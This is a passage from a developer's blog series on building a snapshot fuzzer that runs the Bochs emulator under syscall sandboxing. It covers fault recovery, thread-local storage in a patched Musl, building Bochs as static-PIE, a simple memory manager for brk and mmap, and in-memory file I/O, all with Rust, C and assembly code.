// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
    let context = unsafe { &mut *contextp };
    match fault {
        Fault::Success => context.fault = Fault::Success,
        ...
    }

    // Attempt to restore Lucid execution
    restore_lucid_execution(contextp);
}

// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal. 
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
    let context = unsafe { &mut *contextp };
    
    // Fault should be set, but change the execution mode now since we're
    // jumping back to Lucid
    context.mode = ExecMode::Lucid;

    // Restore extended state
    let save_area = context.lucid_save_area;
    let save_inst = context.save_inst;
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) };

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

    // Next, we need to restore our GPRs. This is kind of different order than
    // returning from a successful context switch since normally we'd still be
    // using our own stack; however right now, we still have Bochs' stack, so
    // we need to recover our own Lucid stack which is saved as RSP in our 
    // register bank
    let lucid_regsp = &context.lucid_regs as *const _;

    // Move that pointer into R14 and restore our GPRs. After that we have the
    // RSP value that we saved when we called into context_switch, this RSP was
    // then subtracted from by 0x8 for the pushfq operation that comes right
    // after. So in order to recover our CPU flags, we need to manually sub
    // 0x8 from the stack pointer. Pop the CPU flags back into place, and then 
    // return to the last known good Lucid state
    unsafe {
        asm!(
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",
            "popfq",
            "ret",
            in(reg) lucid_regsp,
        );
    }
}

As you can see, restoring Lucid state and resuming execution is quite involved, One tricky thing we had to deal with was the fact that right now, when a Fault occurs, we are likely operating in Bochs mode which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the “return” value of such functions by checking if there was a Fault noted in the execution context like so:

	// Start executing Bochs
    prompt!("Starting Bochs...");
    start_bochs(&mut lucid_context);

    // Check to see if any faults occurred during Bochs execution
    if !matches!(lucid_context.fault, Fault::Success) {
        fatal!(LucidErr::from_fault(lucid_context.fault));
    }

Pretty neat imo!

Sandboxing Thread-Local-Storage

Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on. Once I implemented the Fault system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs register was used to load the address from memory. Typically, fs is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs register. So I did a quick grep through Musl looking for fs register access and found the following:

/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.text
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
__set_thread_area:
	mov %rdi,%rsi           /* shift for syscall */
	movl $0x1002,%edi       /* SET_FS register */
	movl $158,%eax          /* set fs segment to */
	syscall                 /* arch_prctl(SET_FS, arg)*/
	ret

So this function, __set_thread_area uses an inline syscall instruction to call arch_prctl to directly manipulate the fs register. This made a lot of sense because, if the syscall instruction was indeed called, we wouldn’t intercept this with our syscall sandboxing infrastructure because we never instrumented this, we’ve only instrumented what boils down to the syscall() function wrapper in Musl. So this would escape our sandbox and directly manipulate fs. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c:

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = __set_thread_area(TP_ADJ(p));
	if (r < 0) return -1;
	if (!r) libc.can_do_threads = 1;
	td->detach_state = DT_JOINABLE;
	td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
	td->locale = &libc.global_locale;
	td->robust_list.head = &td->robust_list.head;
	td->sysinfo = __sysinfo;
	td->next = td->prev = td;
	return 0;
}

So in this __init_tp function, we’re given a pointer and then we call TP_ADJ macro to do some arithmetic on the pointer and pass that value to __set_thread_area so that fs is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area itself, so I just changed the source so that Musl would instead just utilize the syscall() wrapper function which calls our instrumented syscall functions under the hood, like so:

#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
	//int r = __set_thread_area(TP_ADJ(p));

Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are not other direct accesses to fs (and there might be still!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the builtin_tls:

static struct builtin_tls {
	char c;
	struct pthread pt;
	void *space[16];
} builtin_tls[1];

So now, when __init_tp is called, the pointer it is giving points to our own TLS block of memory we’ve created in the execution context so that we now have access to things like errno in Lucid:

if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
		__asm__ __volatile__ ("int3"); // Added by me just in case
		mem = (void *)__syscall(
			SYS_mmap2,
			0, libc.tls_size, PROT_READ|PROT_WRITE,
			MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
		/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */
	} else {
		// Check to see if we're running under Lucid or not
		if (!g_lucid_ctx) { mem = builtin_tls; }
		else { mem = &g_lucid_ctx->tls; }
	}

	/* Failure to initialize thread pointer is always fatal. */
	if (__init_tp(__copy_tls(mem)) < 0)
		a_crash();

#[repr(C)]
#[derive(Clone)]
pub struct Tls {
    padding0: [u8; 8], // char c
    padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
    pub errno: i32,
    padding2: [u8; 144], // Additional padding to get to 200-bytes total
    padding3: [u8; 128], // 16 void * values
}

So now for example, if during a read syscall, we get passed a NULL buffer, we can return an error code and set errno appropriately from the syscall handler in Lucid:

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

There may still be other accesses to fs and gs that I’m not currently sandboxing, but we haven’t reached that part of development yet.

Building Bochs

I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built --static-pie was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didn’t have a C++ library that we could use that had been built against our custom Musl.

Luckily, there is an awesome project called the musl-cross-make project, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the The GNU C++ Library, libstdc++, that is part of the gcc project.

musl-cross-make will pull down all of constituent tool-chain components and create a from scratch tool chain that will utilize a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes, is recompile that Musl libc with our custom patches that we make with Lucid, and then use the tool chain to compile Bochs as --static-pie. It really was as simple as:

git clone musl-cross-make
configure an x86_64 tool chain target
build the tool chain
go into its Musl directory, apply our Musl patches
configure Musl to build/install into the musl-cross-make output directory
re-build Musl libc
configure Bochs to use the new toolchain and set the --static-pie flag

This is the Bochs configuration file that I used to build Bochs:

#!/bin/sh

CC="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"
CXX="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"
CFLAGS="-Wall --static-pie -fPIE"
CXXFLAGS="$CFLAGS"

export CC
export CXX
export CFLAGS
export CXXFLAGS

./configure --enable-sb16 \
                --enable-all-optimizations \
                --enable-long-phy-address \
                --enable-a20-pin \
                --enable-cpu-level=6 \
                --enable-x86-64 \
                --enable-vmx=2 \
                --enable-pci \
                --enable-usb \
                --enable-usb-ohci \
                --enable-usb-ehci \
                --enable-usb-xhci \
                --enable-busmouse \
                --enable-e1000 \
                --enable-show-ips \
                --enable-avx \
                --with-nogui

This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and also will include already built Bochs binary.

Implementing a Simple MMU

Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk, mmap, and munmap. Our test program was very simple and we hadn’t come across these syscalls yet.

These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk calls to use and mmap calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.

So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap call ourselves when we set up the MMU as part of the execution context initialization routine:

// Structure to track memory usage in Bochs
#[derive(Clone)]
pub struct Mmu {
    pub brk_base: usize,        // Base address of brk region, never changes
    pub brk_size: usize,        // Size of the program break region
    pub curr_brk: usize,        // The current program break
    
    pub mmap_base: usize,       // Base address of the `mmap` pool
    pub mmap_size: usize,       // Size of the `mmap` pool
    pub curr_mmap: usize,       // The current `mmap` page base
    pub next_mmap: usize,       // The next allocation base address
}

impl Mmu {
    pub fn new() -> Result<Self, LucidErr> {
        // We don't care where it's mapped
        let addr = std::ptr::null_mut::<libc::c_void>();

        // Straight-forward
        let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;

        // This is normal
        let prot = libc::PROT_WRITE | libc::PROT_READ;

        // This might change at some point?
        let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

        // No file backing
        let fd = -1 as libc::c_int;

        // No offset
        let offset = 0 as libc::off_t;

        // Try to `mmap` this block
        let result = unsafe {
            libc::mmap(
                addr,
                length,
                prot,
                flags,
                fd,
                offset
            )
        };

        if result == libc::MAP_FAILED {
            return Err(LucidErr::from("Failed `mmap` memory for MMU"));
        }

        // Create MMU
        Ok(Mmu {
            brk_base: result as usize,
            brk_size: DEFAULT_BRK_SIZE,
            curr_brk: result as usize,
            mmap_base: result as usize + DEFAULT_BRK_SIZE,
            mmap_size: DEFAULT_MMAP_SIZE,
            curr_mmap: result as usize + DEFAULT_BRK_SIZE,
            next_mmap: result as usize + DEFAULT_BRK_SIZE,
        })
    }

Handling memory-management syscalls actually wasn’t too difficult, there were some gotcha’s early on but we managed to get something working fairly quickly.

Handling `brk`

brk is a syscall used to increase the size of the data segment in your program. So a typical pattern you’ll see is that the program will call brk(0), which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000), and you can see that in the Bochs strace output:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000

So in our syscall handler, I have the following logic for brk:

// brk
        0xC => {
            // Try to update the program break
            if context.mmu.update_brk(a1).is_err() {
                fault!(contextp, Fault::InvalidBrk);
            }

            // Return the program break
            context.mmu.curr_brk as u64
        },

This is effectively a wrapper around the update_brk method we’ve implemented for Mmu, so let’s look at that:

// Logic for handling a `brk` syscall
    pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
        // If addr is NULL, just return nothing to do
        if addr == 0 { return Ok(()); }

        // Check to see that the new address is in a valid range
        let limit = self.brk_base + self.brk_size;
        if !(self.curr_brk..limit).contains(&addr) { return Err(()); }

        // So we have a valid program break address, update the current break
        self.curr_brk = addr;

        Ok(())
    }

So if we get a NULL argument in a1, we have nothing to do, nothing in the current MMU state needs adjusting, we just simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of brk memory is large enough to accomodate the request and if it is, we adjust the current program break and return that to the caller.

Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.

Handling `mmap` and `munmap`

mmap is a bit more involved, but still easy to track through. For mmap calls, theres more state we need to track because there are essentially “allocations” taking place that we need to keep in mind. Most mmap calls will have a NULL argument for address because they don’t care where the memory mapping takes place in virtual memory, in that case, we default to our main method do_mmap that we’ve implemented for Mmu:

// If a1 is NULL, we just do a normal mmap
            if a1 == 0 {
                if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
                    fault!(contextp, Fault::InvalidMmap);
                }

                // Succesful regular mmap
                return context.mmu.curr_mmap as u64;
            }

// Logic for handling a `mmap` syscall with no fixed address support
    pub fn do_mmap(
        &mut self,
        len: usize,
        prot: usize,
        flags: usize,
        fd: usize,
        offset: usize
    ) -> Result<(), ()> {
        // Page-align the len
        let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

        // Make sure we have capacity left to satisfy this request
        if len + self.next_mmap > self.mmap_base + self.mmap_size { 
            return Err(());
        }

        // Sanity-check that we don't have any weird `mmap` arguments
        if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
            return Err(())
        }

        if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
            return Err(())
        }

        if fd as i64 != -1 {
            return Err(())
        }

        if offset != 0 {
            return Err(())
        }

        // Set current to next, and set next to current + len
        self.curr_mmap = self.next_mmap;
        self.next_mmap = self.curr_mmap + len;

        // curr_mmap now represents the base of the new requested allocation
        Ok(())
    }

Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap memory pool, we check to make sure the other arguments are what we’re anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.

There is also a case where mmap will be called with a non-NULL address and MAP_FIXED flags meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000

For this special case, there is really nothing for us to do since that address is in the brk pool. We already know about that memory, we’ve already created it, so this last mmap call you see above amounts to a NOP for us, there is nothing to do but return the address back to the caller.

At this time, we don’t support MAP_FIXED calls for non-brk pool memory.

For munmap, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.

You can see that Bochs does quite a bit of brk and mmap calls and our fuzzer is now capable of handling them all via our MMU:

...
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
...

File I/O

With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:

open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024

The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to just already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward, we really only need to keep a few metadata and the file contents themselves:

#[derive(Clone)]
pub struct FileTable {
    files: Vec<File>,
}

impl FileTable {
    // We will attempt to open and read all of our required files ahead of time
    pub fn new() -> Result<Self, LucidErr> {
        // Retrieve .bochsrc
        let args: Vec<String> = std::env::args().collect();

        // Check to see if we have a "--bochsrc-path" argument
        if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
            return Err(LucidErr::from("No `--bochsrc-path` argument"));
        }

        // Search for the value
        let mut bochsrc = None;
        for (i, arg) in args.iter().enumerate() {
            if arg == "--bochsrc-path" {
                if i >= args.len() - 1 {
                    return Err(
                        LucidErr::from("Invalid `--bochsrc-path` value"));
                }
            
                bochsrc = Some(args[i + 1].clone());
                break;
            }
        }

        if bochsrc.is_none() { return Err(
            LucidErr::from("No `--bochsrc-path` value provided")); }
        let bochsrc = bochsrc.unwrap();

        // Try to read the file
        let Ok(data) = read(&bochsrc) else { 
            return Err(LucidErr::from(
                &format!("Unable to read data BLEGH from '{}'", bochsrc)));
        };

        // Create a file now for .bochsrc
        let bochsrc_file = File {
            fd: 3,
            path: ".bochsrc".to_string(),
            contents: data.clone(),
            cursor: 0,
        };

        // Insert the file into the FileTable
        Ok(FileTable {
            files: vec![bochsrc_file],
        })
    }

    // Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file, this really should never happen?
        Err(())
    }

    // Look a file up by fd and then return a mutable reference to it
    pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
        self.files.iter_mut().find(|file| file.fd == fd)
    }
}

#[derive(Clone)]
pub struct File {
    pub fd: i32,            // The file-descriptor Bochs has for this file
    pub path: String,       // The file-path for this file
    pub contents: Vec<u8>,  // The actual file contents
    pub cursor: usize,      // The current cursor in the file
}

So when Bochs asks to read a file and provides the fd, we just check the FileTable for the correct file and then read its contents from the File::contents buffer and then update the cursor struct member to keep track of where in the file our current offset is.

// read
        0x0 => {
            // Check to make sure we have the requested file-descriptor
            let Some(file) = context.files.get_file(a1 as i32) else {
                println!("Non-existent file fd: {}", a1);
                fault!(contextp, Fault::NoFile);
            };

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

            // Adjust read size if necessary
            let length = std::cmp::min(a3, file.contents.len() - file.cursor);

            // Copy the contents over to the buffer
            unsafe { 
                std::ptr::copy(
                    file.contents.as_ptr().add(file.cursor),    // src
                    buf_p,                                      // dst
                    length);                                    // len
            }

            // Adjust the file cursor
            file.cursor += length;

            // Success
            length as u64
        },

open calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:

// open
        0x2 => {
            // Get pointer to path string we're trying to open
            let path_p = a1 as *const libc::c_char;

            // Make sure it's not NULL
            if path_p.is_null() {
                fault!(contextp, Fault::NullPath);
            }            

            // Create c_str from pointer
            let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };

            // Create Rust str from c_str
            let Ok(path_str) = c_str.to_str() else {
                fault!(contextp, Fault::InvalidPathStr);
            };

            // Validate permissions
            if a2 as i32 != 32768 {
                println!("Unhandled file permissions: {}", a2);
                fault!(contextp, Fault::Syscall);
            }

            // Open the file
            let fd = context.files.open(path_str);
            if fd.is_err() {
                println!("Non-existent file path: {}", path_str);
                fault!(contextp, Fault::NoFile);
            }

            // Success
            fd.unwrap() as u64
        },

// Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file
        Err(())
    }

And that’s really the whole of file I/O right now. Down the line, we’ll need to keep these in mind when we’re doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.

Conclusion

The work continues on the fuzzer, I’m still having a blast implementing it, special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and it get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program such that we can snapshot and fuzz appropriately, that should be really fun, until then!

Fuzzer Development 2: Sandboxing Syscalls

2024-02-17T00:00:00+00:00

Introduction

